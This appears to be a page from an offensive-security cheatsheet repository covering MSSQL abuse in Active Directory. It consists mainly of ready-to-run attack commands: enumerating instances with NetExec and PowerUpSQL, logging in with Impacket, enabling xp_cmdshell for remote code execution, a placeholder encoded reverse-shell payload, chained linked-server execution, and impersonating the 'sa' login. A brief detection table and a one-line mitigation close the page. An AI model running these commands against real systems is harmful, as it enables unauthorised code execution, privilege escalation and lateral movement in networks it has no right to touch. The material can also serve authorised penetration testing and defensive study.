daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-76-mssql-server-and-linked-server-abuse.md (4688B)


      1 ---
      2 title: "Attack #76 β€” MSSQL Server and Linked Server Abuse"
      3 description: "MSSQL servers in AD environments can be exploited for privilege escalation and lateral movement. Key techniques include: xp_cmdshell for RCE, linked…"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement", "sql-injection"]
      7 tools: ["NetExec", "Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/πŸ”· Attack #76 β€” MSSQL Server and Linked Server Abuse.md"
     11 ---
     12 # πŸ”· Attack #76 β€” MSSQL Server & Linked Server Abuse
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 MSSQL servers in AD environments can be exploited for privilege escalation and lateral movement. Key techniques include: **xp_cmdshell** for RCE, **linked servers** for cross-server lateral movement (hopping through database links to reach otherwise unreachable servers), and **impersonation** to escalate from a low-privileged DB user to `sa`.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **MSSQL access** | Domain user may have default access to MSSQL instances |
     27 | **xp_cmdshell or impersonation rights** | For execution and escalation |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ### πŸ”΅ Enumerate MSSQL Instances
     34 
     35 ```bash
     36 # ── NetExec ───────────────────────────────────────────────────────────────────
     37 nxc mssql 10.10.10.0/24 -u low_user -p 'Password1'
     38 
     39 # ── PowerUpSQL ────────────────────────────────────────────────────────────────
     40 Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
     41 ```
     42 
     43 ### πŸ”΄ xp_cmdshell β€” RCE
     44 
     45 ```bash
     46 # ── Impacket mssqlclient.py ───────────────────────────────────────────────────
     47 mssqlclient.py corp.local/low_user:'Password1'@SQL01.corp.local -windows-auth
     48 
     49 # Inside MSSQL:
     50 # enable_xp_cmdshell
     51 # xp_cmdshell whoami
     52 # xp_cmdshell powershell -e <base64_reverse_shell>
     53 ```
     54 
     55 ```powershell
     56 # ── PowerUpSQL ────────────────────────────────────────────────────────────────
     57 Invoke-SQLOSCmd -Instance SQL01.corp.local -Command "whoami"
     58 ```
     59 
     60 ### πŸ”΄ Linked Server Hopping
     61 
     62 ```sql
     63 -- ── Find linked servers ──────────────────────────────────────────────────────
     64 SELECT * FROM master..sysservers;
     65 EXEC sp_linkedservers;
     66 
     67 -- ── Execute on linked server ──────────────────────────────────────────────────
     68 EXEC ('xp_cmdshell ''whoami''') AT [SQL02.corp.local];
     69 
     70 -- ── Double hop (chain through linked servers) ─────────────────────────────────
     71 EXEC ('EXEC (''xp_cmdshell ''''whoami'''''') AT [SQL03.corp.local]') AT [SQL02.corp.local];
     72 ```
     73 
     74 ### πŸ”΄ Impersonation
     75 
     76 ```sql
     77 -- ── Check who you can impersonate ─────────────────────────────────────────────
     78 SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
     79 
     80 -- ── Impersonate sa ────────────────────────────────────────────────────────────
     81 EXECUTE AS LOGIN = 'sa';
     82 EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
     83 EXEC xp_cmdshell 'whoami';
     84 ```
     85 
     86 ***
     87 
     88 ## πŸ›‘οΈ Detection β€” Event IDs
     89 
     90 | Event ID | Source | What to Look For |
     91 |---|---|---|
     92 | **15457** | SQL Server | xp_cmdshell enabled |
     93 | **18456** | SQL Server | Failed login attempts |
     94 | **4688** | Security Log | sqlservr.exe spawning cmd.exe/powershell |
     95 
     96 ***
     97 
     98 ## πŸ”— Attack Chain Context
     99 
    100 ```
    101 [MSSQL Abuse] ──→ RCE via xp_cmdshell / lateral move via linked servers
    102          β”‚
    103          β”œβ”€β”€β†’ πŸ’» xp_cmdshell β†’ SYSTEM/service account on DB server
    104          β”œβ”€β”€β†’ πŸ”— Linked servers β†’ hop to unreachable network segments
    105          └──→ πŸ’€ Defeated by: disable xp_cmdshell, audit linked servers, least privilege
    106 ```
    107 
    108 ***
    109 
    110 > βœ… **Attack #76 β€” MSSQL/Linked Server Abuse complete.**